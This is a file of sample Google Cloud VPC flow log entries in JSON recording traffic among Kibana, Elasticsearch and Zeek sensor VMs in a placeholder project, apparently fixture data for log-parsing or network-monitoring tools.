-{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"203.0.113.58","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"203.0.113.134","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.27","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.27","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"198.51.100.88","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"198.51.100.88","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"203.0.113.58","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 